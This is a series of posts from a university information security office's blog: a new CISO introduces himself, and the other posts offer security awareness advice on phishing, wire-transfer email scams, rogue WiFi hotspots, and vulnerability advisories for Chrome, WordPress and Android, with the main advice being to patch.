The Return of the CISO Blog

Welcome (back) to the CISO blog, and thanks for visiting. This is the initial blog post of the second CISO to serve at Princeton.

My name is David Sherry, and I come to you after working most recently as the CISO at Brown University. I’m honored to become part of the Princeton community, and I look forward to working with all of you to make the university more secure.

My first few months will be spent learning the culture and the campus, and meeting as many people as I can. Forgive me if I don’t catch your name the first time, and trust me that I will work hard at that. During these initial months, I’ll be watching, observing, asking questions and listening. I’m already impressed with the experience and knowledge of those I’ve spoken with, and I’m thrilled to be part of such a passionate community.

After settling in, I’ll be working with the CIO to set a strategic vision and correlating plan for information security campus wide. I am charged at Princeton to lead the university efforts in increasing security and reducing risk relative to information, and I’ll do this through providing broad and proactive security expertise, supporting a robust secure network architecture, creating a culture of security through awareness, and supporting the efforts of privacy and compliance.

Of course, I can’t do this alone, and I consider every colleague to be part of the security “team”. That being said, drop me a line, set up a time to chat over coffee, or invite me to join one of your staff meetings. We’re in this together!

Down the road, this blog will comment on newsworthy items on security and privacy, and share updates on the progress of the security mission. I’ll also be unveiling awareness efforts as they develop, and will be seeking feedback. Don’t be shy!

Until then, please introduce yourself. I’m on the second floor of 701 Carnegie. You can also follow me on Twitter @CISOatPrinceton.

Thanks for reading, and remember, Sec_rity is not complete without U!

Comments Off on The Return of the CISO Blog

Malware is Everywhere – Even on Apple Devices

In the ‘old’ days, circa 1999, Mac users claimed that they didn’t need to run anti-virus, there were no viruses for Mac computers.  At the time, that was close to the truth.  But today, no operating system – whether it’s on a laptop, desktop, tablet, or phone – is immune to viruses or malware.  EVERY system is susceptible.

What can you do about it?

Well, if you’re running an operating system for which anti-virus and anti-malware tools have been developed (like Windows and Mac OSX), install and run those tools religiously.  You’ll find that many vendors have provided free versions of their corporate tools so that you can run them on your personal devices.  In the office, use the tools provided by your SCADs, or download tools that Princeton has made available to you.  If you’re not sure where to find these tools, contact the HelpDesk, they’ll gladly assist you.

Keep your operating systems up-to-date and patched with the latest security patches provided by the vendor.  Subscribe to a listserv that will notify you when new patches and/or updates are published.

Scan your device (your laptop, workstation, tablet, or phone) for vulnerabilities and to check for credit cards and other personal information that may be on your device.  Use the free tool available to you:  http://www.princeton.edu/itsecurity/scanmydevice/.  Limit what’s on your device, and you’ll limit your risk.

Be proactive about understanding what’s on your device and reducing your exposure to viruses and malware.

If you have any questions about this post, or any information security issue, contact the Chief Information Security Officer, Ellen Amsel (eamsel@princeton.edu) or the Support and Operations Center (helpdesk@princeton.edu).

Comments Off on Malware is Everywhere – Even on Apple Devices

It’s Really OK to Ask

Have you ever received an email that didn’t look right?

Do you ever wonder if it’s safe to open an email attachment?

Have you ever received an email from an important executive in your organization asking you to do something out of the ordinary?

Eventually, we all receive emails that seem just a little off.  Socially, we’ve been raised to think that it’s not polite to question others when they ask something of you.  But in today’s world of electronic mail, how do you really know if someone legitimate actually sent you that email?  Sometimes you don’t!

So the next time you receive an email that seems just a little odd, whatever the reason, trust your judgement.  Pick up the phone and ask the sender of the email (remember, if you hit reply, you’re email will go back to whoever sent the email, who may not be legitimate).  Did you send that email to me?  Did you really want me to to take an action at work that I usually wouldn’t?  You may feel a little uncomfortable doing this the first or second time, but in the long run, you would feel much worse if it turned out that the email wasn’t legitimate and you actually did the wrong thing.  Sometimes these types of mistakes can cost organizations millions of dollars.

There’s a scam going on right now, directed at financial departments within organizations.  An executive (it’s not really the executive, but someone spoofed his/her email address) sends an email to someone in accounting asking them to send a wire transfer for a very large sum of money to a specified account.  It’s not the usual account, but the individual in accounting is uncomfortable verifying the email with the executive.  After all s/he’s the big executive and the individual is just a worker in accounting…  That’s exactly what the scammers are counting on.  That a worker is uncomfortable questioning the request.  It’s a different type of social engineering, but it still works.

So give yourself permission to ask.  Verify the email with the so-called sender.  Pick up the phone and talk, and don’t worry about feeling uncomfortable.  Do the right thing – trust but verify.  Check before doing something that doesn’t feel right.  You’ll feel much better in the long run.

If you have any questions about this post, or any information security issue, contact the Chief Information Security Officer, Ellen Amsel (eamsel@princeton.edu) or the Support and Operations Center (helpdesk@princeton.edu).

Comments Off on It’s Really OK to Ask

Apple Pay – Don’t Get Hoodwinked

A previous blog discusses why you shouldn’t keep your phone’s WiFi on all the time:  https://iso.princeton.edu/2015/04/23/why-you-should-keep-your-phones-wifi-off/

Leaving your phone’s WiFi on allows hackers to force your phone to connect to their network.  Once you’re on their network, they can surreptitiously send malware to your phone.  But now it’s gotten worse:  once the hacker forces your phone onto their network, they’re now sending web pages that appear to be from Apple Pay telling you to re-enter your credit card information.

Don’t be fooled!  If you receive a web page on your phone requesting you to re-enter your credit card and other personal information for Apple Pay (you should be suspicious of any type of request like this), DON’T!  If you think your Apple Pay information isn’t correct or missing, use your phone’s internet service (and not a public WiFi connection) to go to Apple Pay and check your information.  DO NOT RESPOND TO AN UNSOLICITED WEB PAGE REQUESTING YOUR PERSONAL INFORMATION.

So now there are two things you should remember:

1.  Keep your phone’s WiFi turned off and only turn it on when absolutely necessary or when you’re connected to a known (preferably private) wireless network

2.  Don’t enter credit card information if you receive an unexpected web page requesting that you re-enter credit card information

If you have any questions about this post, or any information security issue, contact the Chief Information Security Officer, Ellen Amsel (eamsel@princeton.edu) or the Support and Operations Center (helpdesk@princeton.edu).

Comments Off on Apple Pay – Don’t Get Hoodwinked

Why You Should Keep Your Phone’s WiFi OFF

source:  http://freedomhacker.net/ios-8-security-flaw-hackers-crash-iphone-ipad-within-wifi-range-3992/

Security researchers unearthed a severe zero-day vulnerability in iOS 8 that could allow a remote attacker to repeatedly crash a users’ Apple iPhone, iPod or iPad just by connecting to the WiFi network, jamming the device into a never ending bootloop (restart loop).

The attack is essentially a low-key Denial of Service (DoS) attack on iOS 8 devices by crashing individual apps and entire iPhones.

The new attack, dubbed No iOS Zone, was uncovered by security researchers Adi Sharabani and Yair Amit, of the mobile device security firm, Skycure. The duo disclosed their latest research at the RSA security conference on Tuesday.

It was shown during a live presentation that it is possible for an attacker to create a malicious WiFi hotspot disguised as an open network, forcing mobile devices to connect and then begin crashing them.

Researchers even demonstrated the No iOS Zone attack has the capability to make iOS functions freeze, causing the phone to further become unusable. It is caused by triggering a large volume of reboot requests at one time.

The No iOS Zone attack is nothing more than a Denial-of-Service attack, causing the phone to crash and become unusable just as a DoS attack against a website overloads the server turning the website offline. Causing both the device and servers to be in an unreachable state.

“Anyone can take any router and create a Wi-Fi hotspot that forces [nearby users]to connect to [attackers]network,” Sharabani said, during his No iOS Zone presentation at RSA, “and then manipulate the traffic to cause [their mobile]apps and the operating system to crash.”

So is there anyway to avoid your iPhone from becoming plagued by the attacker’s malicious hotspot? No. In short, there is no way to avoid becoming rid of the No iOS Zone attack due to your phone being in an unreachable state.

The only way to avoid the attack is to leave, or run away from the malware-laden WiFi and connect somewhere safer. Or disable your Wifi.

If you have any questions about this post, or any information security issue, contact the Chief Information Security Officer, Ellen Amsel (eamsel@princeton.edu) or the Support and Operations Center (helpdesk@princeton.edu).

Comments Off on Why You Should Keep Your Phone’s WiFi OFF

Vulnerabilities in Google Chrome Identified

The New Jersey Cybersecurity & Communications Integration Cell (NJCCIC) @ the Regional Operations Intelligence Center (ROIC) provides the following advisory for your situational awareness.

OVERVIEW:
Multiple vulnerabilities have been discovered in Google Chrome, which could result in remote code execution. Google Chrome is a web browser used to access the Internet. These vulnerabilities can be exploited if a user visits, or is redirected to, a specially crafted web page. Attackers can exploit these issues to execute arbitrary code in the context of the browser.

Depending on the privileges afforded to the browser an attacker can bypass security restrictions, or cause denial-of-service conditions; other attacks may also be possible.

THREAT INTELLIGENCE:
There are currently no reports of these vulnerabilities being exploited in the wild

SYSTEM AFFECTED:
* Google Chrome Prior to version 42.0.2311.90

RISK:
Government:
* Large and medium government entities: High
* Small government entities: High
Businesses:
* Large and medium business entities: High
* Small business entities: High
Home users: High

TECHNICAL SUMMARY:
Thirteen vulnerabilities have been discovered in Google Chrome these vulnerabilities can be triggered by a user visiting a specially crafted web page. Details of these vulnerabilities are as follows:
* Cross-origin bypass in the HTML parser (CVE-2015-1235)
* Cross-origin bypass in Blink (CVE-2015-1236)
* Use-after-free in IPC (CVE-2015-1237)
* Out-of-bounds write error in Skia (CVE-2015-1238)
* Out-of-bounds read error in WebGL (CVE-2015-1240)
* Tap-Jacking attack (CVE-2015-1241)
* Type Confusion attack in V8 (CVE-2015-1242)
* HSTS bypass attack in WebSockets (CVE-2015-1244)
* Use-after free in PDFium (CVE-2015-1245)
* Out-of-bounds read error in Blink (CVE-2015-1246)
* Scheme issues flaw in OpenSearch (CVE-2015-1247)
* SafeBrowsing bypass attack (CVE-2015-1248)
* Multiple vulnerabilities were fixed in V8, the JavaScript engine in use by Google Chrome (CVE-2015-1249)

Successful exploitation could allow an attacker to execute arbitrary code in the context of the browser. Depending on the privileges afforded to the browser an attacker can bypass security restrictions, or cause denial-of-service conditions; other attacks may also be possible.

RECOMMENDATIONS:
We recommend the following actions be taken:
* Apply appropriate patches provided by Google to vulnerable systems immediately after appropriate testing.
* Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.
* Remind users not to visit un-trusted websites or follow links provided by unknown or un-trusted sources.
* Inform and educate users regarding the threats posed by hypertext links contained in emails or attachments especially from un-trusted sources.

REFERENCES:

Google Chrome:

http://googlechromereleases.blogspot.ie/2015/04/stable-channel-update_14.html

 

Security Focus:

http://www.securityfocus.com/bid/74165

http://www.securityfocus.com/bid/74167

 

CVE:

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1235

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1236

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1237

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1238

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1240

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1241

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1242

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1244

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1245

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1246

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1247

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1248

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1249

Comments Off on Vulnerabilities in Google Chrome Identified

Here Comes Another WordPress Vulnerability

It’s no longer a surprise that there’s another WordPress vulnerability.

WP Super Cache, a WordPress plugin, contains a persistent XSS vulnerability in versions prior to 1.4.4. Exploitation of this vulnerability could allow a remote attacker to take control of the affected system.

Users and administrators are encouraged to review the WP Super Cache Changelog for more information and update to version 1.4.4 if affected.

If you’re running WordPress on cPanel, consider using the Enterprise version offered at Princeton, where all the patching is done for you, and you don’t need to worry about each announced vulnerability and patch.  Contact the the Support and Operations Center (helpdesk@princeton.edu) for more information.

If you have any questions about this post, or any information security issue, contact the Chief Information Security Officer, Ellen Amsel (eamsel@princeton.edu) or the Support and Operations Center (helpdesk@princeton.edu).

Comments Off on Here Comes Another WordPress Vulnerability

Android Malware – Update to Protect Yourself

There is a widespread vulnerability in Google’s Android OS estimated to impact 49.5 percent of all current Android users. This malware:

– allows an attacker to modify or replace a seemingly benign Android app with malware, without user knowledge. This only affects applications downloaded from third-party app stores.

– can gain full access to a compromised device, including usernames, passwords, and sensitive data.

Palo Alto Networks worked with Google and major manufacturers such as Samsung and Amazon to inform them of the vulnerability and issue patches for their devices.

The vulnerability in the Android OS permits an attacker to hijack the ordinary Android installation process. This hijacking technique can be used to bypass the user view and distribute malware with arbitrary permissions. It can substitute one application with another, for instance if a user tries to install a legitimate version of “Angry Birds” and ends up with a Flashlight app that’s running malware.

For detailed information on the vulnerability and mitigation strategies:  http://researchcenter.paloaltonetworks.com/2015/03/android-installer-hijacking-vulnerability-could-expose-android-users-to-malware/

If you have any questions about this post, or any information security issue, contact the Chief Information Security Officer, Ellen Amsel (eamsel@princeton.edu) or the Help Desk (helpdesk@princeton.edu).

Comments Off on Android Malware – Update to Protect Yourself

Let’s Keep Our Passwords Private

Your password is a private piece of information that you should never give out freely.  Remember, it’s what protects your accounts from being accessed by strangers.  NEVER GIVE OUT YOUR PASSWORD, especially if someone asks you for it.

Recently, as part of the Jimmy Kimmel Show, an interviewer went out onto Hollywood Blvd in Los Angeles and asked random people, “What’s your password?”

Sadly, although quite entertaining, people willingly told the interviewer their passwords. Here’s the video on YouTube: https://www.youtube.com/watch?v=opRMrEfAIiI .

If you have any questions about this post, or any information security issue, contact the Chief Information Security Officer, Ellen Amsel (eamsel@princeton.edu) or the Help Desk (helpdesk@princeton.edu).

Comments Off on Let’s Keep Our Passwords Private

It’s Tax Season And The Fraudsters Are At It Again!

The following information is brought to you by REN-ISAC (The Research and Education Network – Information Sharing and Education Center [http://www.ren-isac.net/]:

Phishing: Scam artists pose as legitimate entities—such as the Internal Revenue Service (IRS), other government agencies, and financial institutions—in an attempt to defraud taxpayers. They use phishing emails to lure users to open malicious email attachments or visit malicious sites to gain access to passwords and sensitive information.

Phone Fraud: The Treasury Inspector General for Tax Administration has received reports of roughly 290,000 contacts and has become aware of nearly 3,000 victims who have collectively paid over $14 million as a result of a phone scam, in which scammers make unsolicited calls to taxpayers fraudulently claiming to be IRS officials and demanding that they send them cash via prepaid debit cards.

Fraudulent filings: There is a reported increase in attempts by scammers who attempt to use victims’ personal information to file fraudulent tax returns, then claim resulting refunds. Taxpayer victims generally have no idea that anything is wrong until they attempt to submit their own returns. In many cases, it is extremely difficult to determine how the perpetrators were able to get the victims’ filing information.

WHAT YOU CAN DO:

  • Beware of contact purportedly from the IRS by phone, email, text, or social media:
    • The IRS will never contact taxpayers by email to request personal or financial information or demand immediate payment via phone.
    • Call the IRS and states directly at 800-829-1040 to confirm legitimate communications from them.
    • Report suspicious activity to phishing@irs.gov or file a report with the Treasury Inspector General for Tax Payer Administration (TIGTA), the Federal Trade Commission, and the police.
  • Remember to protect your personally identifiable information
    • File tax returns early to thwart identity thieves.
    • Do not open email attachments or click on links from unknown or questionable sources.
    • Do not provide social security numbers and financial account information to anyone unless required.
    • If you think you are a victim of identity fraud, contact the IRS Identity Protection Specialized Unit, 1- 800-908-4490 and the states where you file taxes to ensure steps are taken to secure your information.

And, as always, if you have any questions about this post or any information security issue, contact the Chief Information Security Officer, Ellen Amsel (eamsel@princeton.edu) or the Help Desk (helpdesk@princeton.edu).

Comments Off on It’s Tax Season And The Fraudsters Are At It Again!